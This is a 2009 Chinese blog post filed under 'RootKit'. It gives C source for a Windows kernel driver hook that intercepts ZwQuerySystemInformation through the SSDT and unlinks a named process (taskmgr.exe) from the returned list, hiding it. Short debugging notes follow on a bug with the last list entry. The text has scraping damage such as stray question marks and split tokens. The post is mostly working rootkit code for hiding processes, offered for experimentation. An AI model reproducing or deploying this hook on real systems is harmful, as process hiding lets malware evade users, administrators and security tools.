Posted on 2009-10-27 17:32
S.l.e!ep.¢% 閱讀(324)
評論(0) 編輯 收藏 引用 所屬分類:
RootKit
[資料] http://www.shnenglu.com/sleepwom/archive/2009/10/24/99375.html
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?
//
定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
&
process_name,?L
"
taskmgr.exe
"
);
????
????rc?
=
?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if
(NT_SUCCESS(rc))?
????{
????????
????????
if
(
5
?
==
?SystemInformationClass)
????????{?
????????????
????????????
struct
?_SYSTEM_PROCESSES?
*
curr?
=
?(
struct
?_SYSTEM_PROCESSES?
*
)SystemInformation;?
????????????
struct
?_SYSTEM_PROCESSES?
*
prev?
=
?NULL;?
????????????
????????????
if
(curr
->
NextEntryDelta)
????????????????curr?
=
?(_SYSTEM_PROCESSES?
*
)((ULONG)curr?
+
?curr
->
NextEntryDelta);?
????????????
????????????
while
(curr)
????????????{
????????????????
if
?(RtlEqualUnicodeString(
&
process_name,?
&
curr
->
ProcessName,?
1
))
????????????????{
????????????????????KdPrint((
"
hide?process'name?taskmgr.exe
"
));
????????????????????
????????????????????
if
(prev)?
????????????????????{?
????????????????????????
if
(curr
->
NextEntryDelta)
????????????????????????{
????????????????????????????prev
->
NextEntryDelta?
+=
?curr
->
NextEntryDelta;
????????????????????????}?
????????????????????????
else
????????????????????????{
????????????????????????????prev
->
NextEntryDelta?
=
?
0
;
????????????????????????}
????????????????????}
????????????????????
else
????????????????????{
????????????????????????
if
(curr
->
NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation?
=
(PVOID)((ULONG)SystemInformation?
+
?curr
->
NextEntryDelta);
????????????????????????}
????????????????????????
else
????????????????????????{
????????????????????????????SystemInformation?
=
?NULL;
????????????????????????}
????????????????????}
????????????????????
????????????????????
if
(curr
->
NextEntryDelta)
????????????????????????curr?
=
?(_SYSTEM_PROCESSES?
*
)((ULONG)curr?
+
?curr
->
NextEntryDelta);
????????????????????
else
????????????????????{
????????????????????????curr?
=
?NULL;
????????????????????????
break
;
????????????????????}
????????????????????
????????????????}?
//
?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
????????????????
if
(curr?
!=
?NULL)
????????????????{
????????????????????prev?
=
?curr;
????????????????????
????????????????????
if
(curr
->
NextEntryDelta)
????????????????????????curr?
=
?(_SYSTEM_PROCESSES?
*
)((ULONG)curr?
+
?curr
->
NextEntryDelta);
????????????????????
else
????????????????????????curr?
=
?NULL;
????????????????????
????????????????}
//
?if(curr?!=?NULL)
????????????????
????????????}
//
?while(curr)?
????????????
????????}
//
?if(5?==?SystemInformationClass)
????????
????}
//
?if(NT_SUCCESS(rc))
????
????
//
?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully
.?\n"));
????
return
?rc;
}
使用自己的查詢進程EXE(
HOOK SSDT Hide Process (五) ),顯示結果是正常的
驅動中判斷的是
taskmgr.exe?,在遍歷時,
taskmgr.exe 剛好在最好一個,把
NextEntryDelta 設置為 0 了
如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的
看來,HOOK SSDT Hide Process (五) 遍歷進程的實現 跟 Taskmgr.exe 的實現有差異, 需要再找時間看下原因
從 MyZwQuerySystemInformation() 的實現來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
還是會把數據傳給用戶態。